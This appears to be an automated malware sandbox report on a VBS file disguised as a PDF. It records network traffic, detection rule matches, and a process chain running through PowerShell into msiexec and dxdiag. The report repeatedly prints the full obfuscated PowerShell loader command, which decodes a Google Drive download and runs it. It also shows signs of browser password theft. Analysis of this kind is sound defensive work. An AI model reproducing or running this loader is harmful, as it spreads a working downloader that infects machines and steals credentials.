                Source: dxdiag.exe, 00000014.00000003.2502961675.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2476461410.000000000603C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/s.cn
                Source: powershell.exe, 00000004.00000002.3034052214.0000000004D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B10CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000002.00000002.2221990774.000001F3C0564000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: dxdiag.exe, 00000014.00000002.3335131309.0000000005FC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wordpress.org/documentation/article/faq-troubleshooting/
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 65312 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65312
                Source: unknownNetwork traffic detected: HTTP traffic on port 65310 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65310
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.5:65310 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:65312 version: TLS 1.2

                System Summary

                barindex
                Source: amsi32_1292.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7156, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:AntndJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D6B2F22_2_00007FF848D6B2F2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D6C0A22_2_00007FF848D6C0A2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E3A09A2_2_00007FF848E3A09A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0310F3204_2_0310F320
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0310FBF04_2_0310FBF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0310EFD84_2_0310EFD8
                Source: Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6999
                Source: unknownProcess created: Commandline size = 6999
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6999Jump to behavior
                Source: amsi32_1292.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7156, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: powershell.exe, 00000004.00000002.3052757147.00000000076AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@34/10@5/4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Smaalige.EksJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2320:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5tgk4xkj.rz5.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7156
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1292
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7156
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: dxdiag.exe, 00000014.00000003.2503662795.0000000021915000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa 